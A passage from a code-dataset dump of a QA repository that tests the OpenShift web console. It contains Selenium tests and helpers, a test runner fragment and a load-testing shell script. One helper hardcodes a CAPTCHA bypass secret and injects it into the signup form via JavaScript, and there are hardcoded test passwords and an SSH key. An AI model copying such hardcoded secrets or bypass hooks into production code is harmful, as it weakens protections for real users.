\\n \\\n Default is writing.\"\n\n def add_options(self, parser):\n parser.add_option('--notcms', action='store_true', dest='no_tcms',\n help='Whether to write results to tcms in real time. \\\n Default is writing.')\n\n def run(self, args, opts):\n params = ParamsHandler()\n log_level = 'DEBUG'\n noncritical = ['noncritical']\n exclude_tag = ['notready']\n cases_path = params.cases_path\n listener = params.tcms_listener\n case_tags = params.case_tags\n output_dir = params.result_path\n if not opts.no_tcms:\n run(cases_path,\n loglevel=log_level,\n include=case_tags,\n exclude=exclude_tag,\n noncritical=noncritical,\n outputdir=output_dir,\n listener=listener)\n else:\n run(cases_path,\n loglevel=log_level,\n include=case_tags,\n exclude=exclude_tag,\n outputdir=output_dir,\n noncritical=noncritical)\n\n\nif __name__ == '__main__':\n pass\n" }, { "alpha_fraction": 0.6568024754524231, "alphanum_fraction": 0.6656417846679688, "avg_line_length": 39.03076934814453, "blob_id": "832a16ce44f4f260eb0e2e8216dacac057004221", "content_id": "417f0268325eb6aa5fbf3bf18b1b57eb824b409d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2602, "license_type": "no_license", "max_line_length": 132, "num_lines": 65, "path": "/automation/open/testmodules/UI/web/US1797_135715.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135715(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link = self.cfg.confirm_url_express\n\n \n def test_u_s1797135715(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user,self.cfg.password)\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.go_to_account_page(self)\n\n driver.find_element_by_link_text(\"Change password...\").click()\n baseutils.wait_element_present_by_id(self, \"web_user_password\")\n\n driver.find_element_by_id(\"web_user_old_password\").clear()\n driver.find_element_by_id(\"web_user_old_password\").send_keys(self.cfg.password)\n\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(\"abcabc\")\n\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(\"abcabb\")\n driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(5)\n baseutils.assert_text_equal_by_xpath(self, \"Passwords must match\", \"id('web_user_password_input')/div/p\")\n \n # Negative case: a password shorter than 6 characters must be rejected\n illegal_passwd=\"aaa\"\n driver.find_element_by_id(\"web_user_password\").clear()\n driver.find_element_by_id(\"web_user_password\").send_keys(illegal_passwd)\n\n driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(illegal_passwd)\n driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(5)\n baseutils.assert_text_equal_by_xpath(self, \"Passwords must be at least 6 characters\", \"id('web_user_password_input')/div/p\")\n\n def 
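_fill_password_fields(self, new_pwd, confirm_pwd):\n # Hypothetical helper (illustration only, not part of the original\n # test): factors out the clear/send_keys pattern repeated above for\n # the password and confirmation inputs.\n self.driver.find_element_by_id(\"web_user_password\").clear()\n self.driver.find_element_by_id(\"web_user_password\").send_keys(new_pwd)\n self.driver.find_element_by_id(\"web_user_password_confirmation\").clear()\n self.driver.find_element_by_id(\"web_user_password_confirmation\").send_keys(confirm_pwd)\n\n def 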
is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5886287689208984, "alphanum_fraction": 0.6061872839927673, "avg_line_length": 28.899999618530273, "blob_id": "e4fe7248f3c0b90e9376f5ce9fccfdd1a3659b99", "content_id": "123cb76e5aaf629b698ff18497a8f98d0c2c00c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 81, "num_lines": 40, "path": "/automation/open/Longevity/10k_stopped_app_create/10K_stopped_app_create.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\napp_type=$1\npwd=$(pwd)\ntime=$(date +%Y%m%d-%H%M%S)\nlog=\"$pwd/${0%.*}_${time}.log\"\n\n#no parameter\napp_create_all()\n{\n\t\tfor app in $app_types;do\n\t\t\trun app_create $app\n \t #run url_check $app_name\n\t\t\trun rhc app stop $app_name -p$passwd --timeout 360\n\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tnoscalable\t\t$(date +%Y%m%d-%H%M%S)\" >> $log\n\n\t\t\tif [ \"$app\" = \"diy-0.1\" ];then\n\t\t\t\techo \"Diy is cann't support scalable !\"\n\t\t\t\tcontinue\n\t\t\tfi\n\n\t\t\trun app_create $app -s\n \t\t #run url_check $app_name\n\t\t\trun rhc app stop $app_name -p$passwd --timeout 360\n\t\t\techo \"$app_name\t\t$cartridge_type\t\t\tscalable\t\t\t$(date +%Y%m%d-%H%M%S)\" >> $log\n\t\tdone\n\techo_yellow \"Already have $(($app_number+1)) applications\"\n}\n\n[ -f function.sh ] || ln -s $(pwd)/../function.sh function.sh\n[ -f common_func.sh ] || ln -s $(pwd)/../common_func.sh common_func.sh\n[ -f AutoCreate.cfg ] || ln -s $(pwd)/../AutoCreate.cfg AutoCreate.cfg\n[ -d testdir ] && rm -rf testdir/* || mkdir testdir\n. ./function.sh\ncd testdir\nrun set_running_parameter\nrhc domain show -predhat|grep jenkins-1.4 > /dev/null\n[ $? 
-ne 0 ] && run app_create jenkins-1.4\nwhile (($app_number < 10000));do\n run app_create_all\ndone\n" }, { "alpha_fraction": 0.6963136792182922, "alphanum_fraction": 0.7020599842071533, "avg_line_length": 39.10144805908203, "blob_id": "a401a16a197fe9d780175265be6ebafdf90de1ed", "content_id": "7e31a35d7cb9290518efac4e4d7b04612e22a91e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27670, "license_type": "no_license", "max_line_length": 122, "num_lines": 690, "path": "/automation/open/testmodules/UI/web/baseutils.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.firefox.firefox_binary import FirefoxBinary\n#from selenium.webdriver.opera.opera_binary import OperaBinary\n#from selenium.webdriver.chrome.chrome_binary import ChromeBinary\nfrom selenium.webdriver.support.ui import WebDriverWait # available since 2.4.0\nimport unittest, time, re\nimport logging\nfrom config import Config\nimport ConfigParser\nimport string\nimport random\nimport os\nimport sys\n\n\nInvalid_input=[\"@##\", u\"\\u2013xx\", \"$ $\", u\"\\u0040x\"]\n\n\nlogging.basicConfig(filename='seleniumtest.log',format='%(levelname)s:%(message)s',level=logging.DEBUG)\nurl=\"https://stg.openshift.redhat.com/\"\n#logging.info('So should this')\n#logging.warning('And this, too')\n\ncfg = Config()\n\ndef initiate(classself):\n cfg = Config()\n tmp_browser=cfg.browser.strip().lower()\n if tmp_browser == 'firefox':\n if len(cfg.proxy) == 0:\n classself.driver = webdriver.Firefox()\n if cfg.browserpath != '0':\n classself.binary = FirefoxBinary(cfg.browserpath)\n classself.driver = webdriver.Firefox(classself.binary)\n else:\n classself.profile=webdriver.FirefoxProfile()\n classself.profile.set_preference(\"network.proxy.type\", 1)\n classself.profile.set_preference(\"network.proxy.http\", cfg.proxy)\n classself.profile.set_preference(\"network.proxy.http_port\", 3128)\n classself.profile.set_preference(\"network.proxy.ssl\", cfg.proxy)\n classself.profile.set_preference(\"network.proxy.ssl_port\", 3128)\n classself.driver = webdriver.Firefox(classself.profile)\n if cfg.browserpath !='0':\n classself.binary = FirefoxBinary(cfg.browserpath)\n classself.driver = webdriver.Firefox(classself.profile,classself.binary)\n elif tmp_browser == 'ie':\n classself.driver = webdriver.Ie()\n elif tmp_browser == 'opera':\n classself.driver = webdriver.Opera()\n elif tmp_browser == 'android':\n classself.driver = webdriver.Android()\n elif tmp_browser == 'chrome':\n classself.driver = webdriver.Chrome()\n else:\n logging.warning(tmp_browser+'is not supported')\n #TODO:classself.warn(\"ECHOOOOO\")\n \n if cfg.browserpath != '0' and tmp_browser == 'chrome':\n classself.driver = webdriver.Chrome(executable_path=cfg.browserpath)\n classself.driver.implicitly_wait(20)\n classself.base_url = cfg.url\n classself.verificationErrors = []\n classself.confirm_url_express = cfg.confirm_url_express\n classself.cfg = cfg\n# basedriver=classself.driver\n\n\ndef is_element_present(classself, how, what):\n try: classself.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n\ndef assert_contain_text_by_id(classself,text,id_name):\n _retry=120\n while(_retry>0):\n _retry=_retry-1\n time.sleep(1)\n try:\n # if 
classself.driver.find_element_by_id(id_name).text.find(text) != -1 : break\n            if text in classself.driver.find_element_by_id(id_name).text : break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_css(classself,text,css_name):\n    _retry=120\n    while(_retry>0):\n        _retry=_retry-1\n        time.sleep(1)\n        try:\n#            if classself.driver.find_element_by_css_selector(css_name).text.find(text) != -1 : break\n            if text in classself.driver.find_element_by_css_selector(css_name).text : break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"the text is not displayed yet\")\n\ndef assert_contain_text_by_xpath(classself,text,xpath):\n    _retry=60\n    while(_retry>0):\n        _retry=_retry-1\n        time.sleep(1)\n        try:\n           # if classself.driver.find_element_by_xpath(xpath).text.find(text) != -1 : break\n            if text in classself.driver.find_element_by_xpath(xpath).text : break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"the text is not displayed yet\")\n\n\ndef is_element_displayed(classself,how,what):\n    try:classself.assertTrue(classself.driver.find_element(by=how,value=what).is_displayed(),what+\" is not displayed\")\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_element_hidden(classself,how,what):\n    try:classself.assertFalse(classself.driver.find_element(by=how,value=what).is_displayed())\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef wait_element_not_displayed_by_id(classself,id_name):\n    # poll until the element is hidden or removed from the DOM\n    for i in range(120):\n        try:\n            if not classself.driver.find_element_by_id(id_name).is_displayed(): break\n        except NoSuchElementException: break\n        time.sleep(1)\n    else: classself.fail(\"time out,%s is still displayed\"%(id_name))\n\ndef is_text_displayed(classself,text,css):\n    try:\n        WebDriverWait(classself.driver, 100).until(lambda driver: driver.find_element_by_css_selector(css))\n        classself.assertTrue( text == classself.driver.find_element_by_css_selector(css).text)\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_displayed_by_id(classself,text,id_name):\n    try:\n        WebDriverWait(classself.driver, 100).until(lambda driver: driver.find_element_by_id(id_name))\n        classself.assertTrue( text == classself.driver.find_element_by_id(id_name).text)\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\n\ndef check_title(classself,title):\n    time.sleep(5)\n    for i in range(60):\n        try:\n            if title == classself.driver.title: break\n        except: pass\n        time.sleep(1)\n    else:classself.fail(\"time out,%s is not equal to %s\" %(title,classself.driver.title))\n\n\ndef assert_element_present_by_css(classself,css):\n    try: classself.assertTrue(is_element_present(classself,By.CSS_SELECTOR,css))\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_css(classself,css):\n    try: classself.assertFalse(is_element_present(classself,By.CSS_SELECTOR,css))\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_id(classself,idname):\n    try: classself.assertTrue(is_element_present(classself,By.ID,idname))\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_not_present_by_id(classself,idname):\n    try: classself.assertFalse(is_element_present(classself,By.ID,idname))\n    except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_xpath(classself,xpath):\n    try: 
classself.assertTrue(is_element_present(classself,By.XPATH,xpath))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_link_text(classself,link_text):\n try: classself.assertTrue(is_element_present(classself,By.LINK_TEXT,link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_partial_link_text(classself,partial_link_text):\n try: classself.assertTrue(is_element_present(classself,By.PARTIAL_LINK_TEXT ,partial_link_text))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present_by_name(classself,name):\n try: classself.assertTrue(is_element_present(classself,By.NAME ,name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_class_name(classself,class_name):\n try: classself.assertTrue(is_element_present(classself,By.CLASS_NAME ,class_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_element_present_by_tag_name(classself,tag_name):\n try: classself.assertTrue(is_element_present(classself,By.TAG_NAME ,tag_name))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_element_present(classself,how,what):\n try: classself.assertTrue(is_element_present(classself,how ,what))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_css(classself,text,css,msg=None):\n try: classself.assertEqual(text,classself.driver.find_element_by_css_selector(css).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_xpath(classself,text,xpath):\n try: classself.assertEqual(text,classself.driver.find_element_by_xpath(xpath).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_equal_by_partial_link_text(classself,text,partial_link_text):\n try: classself.assertEqual(text,classself.driver.find_element_by_partial_link_text(partial_link_text).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\n\ndef assert_text_equal_by_id(classself,text,id_name):\n try: classself.assertEqual(text,classself.driver.find_element_by_id(id_name).text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_regexp_match_by_css(classself,text,css):\n try: classself.assertRegexpMatches(classself.driver.find_element_by_css_selector(css).text,text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_text_regexp_match_by_xpath(classself, text, xpath):\n try: classself.assertRegexpMatches(classself.driver.find_element_by_xpath(xpath).text,text)\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef assert_value_equal_by_id(classself,value,id_name):\n try: classself.assertEqual(value,classself.driver.find_element_by_id(id_name).get_attribute(\"value\"))\n except AssertionError as e: classself.verificationErrors.append(str(e))\n\ndef is_text_equal_by_css(classself,text,css):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_css_selector(css).text: break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_css_selector(css).text))\n\ndef is_text_equal_by_xpath(classself,text,xpath):\n for i in range(60):\n try:\n if text == classself.driver.find_element_by_xpath(xpath).text: 
break\n except: pass\n time.sleep(1)\n else:classself.fail(\"time out,%s is not equal to %s\" %(text,classself.driver.find_element_by_xpath(xpath).text))\n\n\n\n \n\n# for i in range(240):\n# try:\n# if not classself.driver.find_element_by_id(id_name).is_displayed(): break\n# except: pass\n# time.sleep(1)\n# else: classself.fail(\"time out\")\n\n#def wait_element_not_displayed_by_id(classself,id_name):\n # wait_element_not_present(classself,By.ID,id_name)\n \n\ndef wait_element_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(xpath))\n\ndef wait_element_not_present_by_xpath(classself,xpath):\n for i in range(60):\n try:\n if not is_element_present(classself,By.XPATH, xpath): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is present\"%(xpath))\n\ndef wait_element_present_by_css(classself,css):\n for i in range(60):\n try:\n if is_element_present(classself,By.CSS_SELECTOR, css): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(css))\n\ndef wait_element_present_by_id(classself,idname):\n for i in range(60):\n try:\n if is_element_present(classself,By.ID, idname): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(idname))\n\ndef wait_element_present_by_class(classself,class_name):\n for i in range(60):\n try:\n if is_element_present(classself,By.CLASS_NAME,class_name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(class_name))\n\ndef wait_element_present_by_name(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.NAME,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\ndef wait_element_present_by_link_text(classself,name):\n for i in range(60):\n try:\n if is_element_present(classself,By.LINK_TEXT,name): break\n except: pass\n time.sleep(1)\n else: classself.fail(\"time out,%s is not present\"%(name))\n\n\ndef click_element_by_css(classself,css):\n wait_element_present_by_css(classself,css)\n classself.driver.find_element_by_css_selector(css).click()\n\ndef click_element_by_id(classself,id_name):\n wait_element_present_by_id(classself,id_name)\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_xpath_wait(classself,xpath):\n wait_element_present_by_xpath(classself,xpath)\n classself.driver.find_element_by_xpath(xpath).click()\n time.sleep(8)\n\ndef click_element_by_link_text(classself,link_text):\n wait_element_present_by_link_text(classself,link_text)\n classself.driver.find_element_by_link_text(link_text).click()\n \n\ndef click_element_by_class(classself,class_name):\n wait_element_present_by_class(classself,class_name)\n classself.driver.find_element_by_class_name(class_name).click()\n\n\ndef click_element_by_css_no_wait(classself,css):\n classself.driver.find_element_by_css_selector(css).click()\n\ndef click_element_by_id_no_wait(classself,id_name):\n classself.driver.find_element_by_id(id_name).click()\n\ndef click_element_by_xpath_no_wait(classself,xpath):\n classself.driver.find_element_by_xpath(xpath).click()\n\ndef click_element_by_partial_link_text_no_wait(classself,partial_link_text):\n 
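# clicks immediately, without first polling for the element to be present\n    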
classself.driver.find_element_by_partial_link_text(partial_link_text).click()\n\ndef go_to_home(classself):\n# basedriver=classself.driver\n classself.driver.get(classself.base_url+\"/app/\")\n# time.sleep(10)\n check_title(classself,\"OpenShift by Red Hat\")\n \n\n#obsolete:\ndef go_to_express(classself):\n pass\n express_page=classself.base_url+\"/app/express\"\n classself.driver.get(express_page)\n '''\n# go_to_home(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Express\")\n\ndef go_to_express_quick_start(classself):\n quick_start=classself.base_url+\"/app/express#quickstart\"\n classself.driver.get(quick_start)\n\n\ndef go_to_flex(classself):\n# go_to_home(classself)\n flex_page=classself.base_url+\"/app/flex\"\n classself.driver.get(flex_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Flex')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Flex\")\n\n\ndef go_to_power(classself):\n# go_to_home(classself)\n power_page=classself.base_url+\"/app/power\"\n classself.driver.get(power_page)\n '''\n click_element_by_xpath(classself,\"//a[contains(text(),'Cloud Services')]\")\n check_title(classself,\"OpenShift by Red Hat | Express\")\n scroll_bar(classself)\n click_element_by_xpath(classself,\"//a[contains(text(),'Power')]\")\n '''\n check_title(classself,\"OpenShift by Red Hat | Power\")\n\ndef go_to_signin(classself):\n classself.driver.get(classself.base_url+\"/app/login\")\n #click_element_by_class(classself,\"sign_in\")\n # time.sleep(5)\n #click_element_by_link_text(classself,\"Sign in\")\n #is_element_displayed(classself,By.ID,\"login-form\")\n #is_element_displayed(classself,By.ID,\"login_input\")\n\n\ndef go_to_signup(classself):\n # scroll_bar(classself)\n #signup_page=classself.base_url+\"/app/user/new/express\"\n go_to_home(classself)\n scroll_to_bottom(classself)\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n time.sleep(2)\n if not is_element_displayed(classself,By.ID,\"signup\"):\n click_element_by_xpath(classself,\".//*[@id='bottom_signup']/div/a\")\n #click_element_by_link_text(classself,\"Sign up and try it\")\n #click_element_by_xpath(classself,\".//*[@id='opener']/div/a\")\n# click_element_by_css(classself,\"a.button.sign_up\")\n is_element_displayed(classself,By.ID,\"signup\")\n\n\n\ndef go_to_console(classself):\n classself.driver.get(classself.base_url+\"/app/console/applications\")\n check_title(classself,\"OpenShift by Red Hat\")\n\ndef go_to_express_console(classself):\n go_to_console(classself)\n# basedriver=classself.driver\n pass\n #classself.driver.get(classself.base_url+\"/app/console/applications\")\n# time.sleep(10)\n #check_title(classself,\"OpenShift by Red Hat\")\n\n\ndef go_to_partners(classself):\n partner_page=classself.base_url+\"/app/partners\"\n classself.driver.get(partner_page)\n check_title(classself,\"OpenShift by Red Hat | Meet Our Partners\")\n\ndef go_to_legal(classself):\n legal_page=classself.base_url+\"/app/legal\"\n classself.driver.get(legal_page)\n check_title(classself,\"OpenShift by Red Hat | Terms and Conditions\")\n classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\n\ndef go_to_platformoverview(classself):\n go_to_home(classself)\n click_element_by_link_text(classself,\"Platform Overview\")\n 
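# check_title below polls the title, so it also acts as the wait for the page load\n    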
check_title(classself,\"OpenShift by Red Hat | Cloud Platform\")\n \ndef go_back(classself):\n classself.driver.back()\n time.sleep(5)\n\ndef input_by_id(classself,id_name,input_content):\n classself.driver.find_element_by_id(id_name).clear()\n classself.driver.find_element_by_id(id_name).send_keys(input_content)\n\n\ndef input_by_name(classself,name,input_content):\n classself.driver.find_element_by_name(name).clear()\n classself.driver.find_element_by_name(name).send_keys(input_content)\n\ndef input_by_xpath(classself,xpath,input_content):\n classself.driver.find_element_by_xpath(xpath).clear()\n classself.driver.find_element_by_xpath(xpath).send_keys(input_content)\n\n\ndef set_captcha(classself):\n classself.driver.execute_script(\"\"\"\n var input_ele = window.document.createElement('input');\n input_ele.setAttribute('type','hidden');\n input_ele.setAttribute('name','captcha_secret');\n input_ele.setAttribute('value','zvw5LiixMB0I4mjk06aR');\n var dialog = window.document.getElementById('signup');\n dialog.getElementsByTagName('form')[0].appendChild(input_ele);\"\"\"\n )\n\n\n\ndef register_a_user(classself,username,password,confirmpassword=\"0\",captcha=False):\n if confirmpassword == \"0\":\n confirmpassword =password\n #wait_element_present_by_id(classself,\"web_user_email_address\")\n input_by_id(classself,\"web_user_email_address\",username)\n input_by_id(classself,\"web_user_password\",password)\n input_by_id(classself,\"web_user_password_confirmation\",confirmpassword)\n if captcha:\n set_captcha(classself)\n classself.driver.find_element_by_id(\"web_user_submit\").click()\n \n\ndef login(classself, username, password):\n classself.driver.get(classself.base_url+\"/app/login\")\n time.sleep(10)\n wait_element_present_by_id(classself, \"web_user_rhlogin\")\n classself.driver.find_element_by_id(\"web_user_rhlogin\").clear()\n classself.driver.find_element_by_id(\"web_user_rhlogin\").send_keys(username)\n classself.driver.find_element_by_id(\"web_user_password\").clear()\n classself.driver.find_element_by_id(\"web_user_password\").send_keys(password)\n classself.driver.find_element_by_id(\"web_user_submit\").click()\n time.sleep(15)\n wait_element_present_by_id(classself, \"utility-nav\")\n assert_text_equal_by_xpath(classself, \"Sign Out\", \"id('utility-nav')/li[3]/a\")\n\ndef login_by_form(classself,username,password):\n wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"input.button\").click()\n time.sleep(5)\n\ndef login_by_window(classself,username,password):\n wait_element_present_by_xpath(classself,\"//div[@id='login-form']/form/label/input\")\n input_by_xpath(classself,\"//div[@id='login-form']/form/label/input\",username)\n input_by_xpath(classself,\"//div[@id='login-form']/form/label[2]/input\",password)\n classself.driver.find_element_by_css_selector(\"form > input.button\").click()\n time.sleep(5)\n\ndef reset_password(classself,user):\n go_to_home(classself)\n go_to_signin(classself)\n click_element_by_xpath(classself,\"//*[@id='lost_password']/p/a\")\n# click_element_by_css(classself,\"a.password_reset.more\")\n time.sleep(2)\n assert_text_equal_by_css(classself,\"Reset your password\",\"#reset_password > header > h1\")\n input_by_id(classself,\"email_input\",user)\n 
click_element_by_css_no_wait(classself,\"#password-reset-form > form > input.button\")\n    \ndef change_password(classself,user,oldpwd,oldpwd2,newpwd,newpwdcfm):\n    go_to_home(classself)\n    time.sleep(4)\n    go_to_signin(classself)\n    login(classself,user,oldpwd)\n    go_to_express_console(classself)\n    scroll_bar(classself)\n    try:click_element_by_link_text(classself,\"Click here to change your password\")\n    except:click_element_by_css(classself,\"a.change_password\")\n    time.sleep(3)\n    assert_text_equal_by_css(classself,\"Change your password\",\"#change_password > header > h1\")\n    input_by_name(classself,\"old_password\",oldpwd2)\n    input_by_id(classself,\"password\",newpwd)\n    input_by_name(classself,\"password_confirmation\",newpwdcfm)\n    click_element_by_css(classself,\"#change-password-form > form > input.button\")\n    time.sleep(1)\n    if classself.driver.current_url not in [classself.base_url+\"/app/dashboard\",classself.base_url+\"/app/control_panel\"]:\n        classself.fail(\"password change redirected to an unexpected location\")\n    \n\ndef scroll_bar(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n    time.sleep(5)\n    classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n    time.sleep(10)\n\ndef scroll_by(classself):\n    classself.driver.execute_script(\"window.scrollBy(-100,-100);\")\n\ndef scroll_to_upper(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, 0);\")\n\ndef scroll_to_middle(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight/2);\")\n\n\ndef scroll_to_bottom(classself):\n    classself.driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\ndef generate_greetings(username):\n    _greetings=\"Greetings, \" + username \n    _greetings+=\"!\"\n    return _greetings\n\ndef logout(classself):\n    assert_element_present_by_link_text(classself,\"Sign Out\")\n    click_element_by_link_text(classself,\"Sign Out\")\n    wait_element_present_by_link_text(classself,\"SIGN IN TO MANAGE YOUR APPS\")\n    assert_element_present_by_link_text(classself, \"SIGN IN TO MANAGE YOUR APPS\")\n\n\ndef wait_for_ajax(classself,timeout = 10):\n    time.sleep(timeout)\n    #WebDriverWait(classself.driver, timeout).until(classself.driver.execute_script(return jQuery.active == 0;))\n\ndef update_config_file(section,name,value):\n    configparse = ConfigParser.RawConfigParser()\n    configparse.read('config.cfg')\n    configparse.set(section,name,value)\n    with open('config.cfg', 'wb') as configfile:\n        configparse.write(configfile)\n\ndef get_random_str(length=12):\n    chars = string.ascii_letters + string.digits\n    return \"\".join(random.choice(chars) for x in range(length))\n\ndef go_to_account_page(classself):\n    classself.driver.get(classself.base_url+\"/app/account\")\n    wait_element_present_by_link_text(classself, \"Change password...\")\n    classself.assertEqual(\"OpenShift by Red Hat | My Account\", classself.driver.title)\n\ndef setup_domain(classself, domain_name=None):\n    driver = classself.driver\n    if domain_name == None:\n        domain_name = get_random_str(16)\n    go_to_account_page(classself)\n    if is_element_present(classself, By.ID, \"domain_submit\"):\n        driver.find_element_by_id(\"domain_name\").clear()\n        driver.find_element_by_id(\"domain_name\").send_keys(domain_name)\n    else:\n        driver.find_element_by_link_text(\"Change your namespace...\").click()\n        driver.find_element_by_id(\"domain_name\").clear()\n        driver.find_element_by_id(\"domain_name\").send_keys(domain_name)\n\n    driver.find_element_by_id(\"domain_submit\").click()\n    
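# the save is confirmed once the namespace edit link reappears on the account page\n    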
wait_element_present_by_link_text(classself, \"Change your namespace...\")\n\n\ndef setup_default_sshkey(classself):\n    go_to_account_page(classself)\n    driver = classself.driver\n    sshkey = \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDMhaH9Gcu7+dvHMd1ALSbFwfHWmElg365nCAbcxokYi998qKYqIyCyExCanTYja+ZiusqXOt5g6Hq6jIam0chZ1tqw8QwJfeeW80uSJZ/16UpSQoZ8JwNpc+/b2M5OOaD/ibnaf2p3RYTQ4ujPx+bOuIEoyWjBLtIUtstbWK6rhrOVweFeR/qMmGgBml0AsUZ++OBp6dEXDgA4xHnemf14g8Rg0tm2fEZD5wo7xw4JdYCl1DezkSCJSW2vy4ALLeCQ7mBW+x2f3KnNa4EtFy/2mL4QB5twhsyKM6OTV8bYXS+cbpfG6Tt4UR5jRC+s7UYCPfpC6ceap4Ggx5fEf/EX\"\n    driver.find_element_by_id(\"key_raw_content\").clear()\n    driver.find_element_by_id(\"key_raw_content\").send_keys(sshkey)\n    driver.find_element_by_id(\"key_submit\").click()\n    wait_element_present_by_xpath(classself, \"id('default_sshkey')/td[1]\")\n\ndef has_domain(classself):\n    go_to_account_page(classself)\n    if is_element_present(classself, By.LINK_TEXT, \"Change your namespace...\"):\n        return True\n    else:\n        return False\n\ndef add_sshkey(classself, name, key):\n    go_to_account_page(classself)\n    driver = classself.driver\n    if (is_element_present(classself, By.LINK_TEXT,\"Add a new key...\")):\n        driver.find_element_by_link_text(\"Add a new key...\").click()\n        wait_element_present_by_id(classself, \"key_name\")\n        driver.find_element_by_id(\"key_name\").clear()\n        driver.find_element_by_id(\"key_name\").send_keys(name)\n        driver.find_element_by_id(\"key_raw_content\").clear()\n        driver.find_element_by_id(\"key_raw_content\").send_keys(key)\n        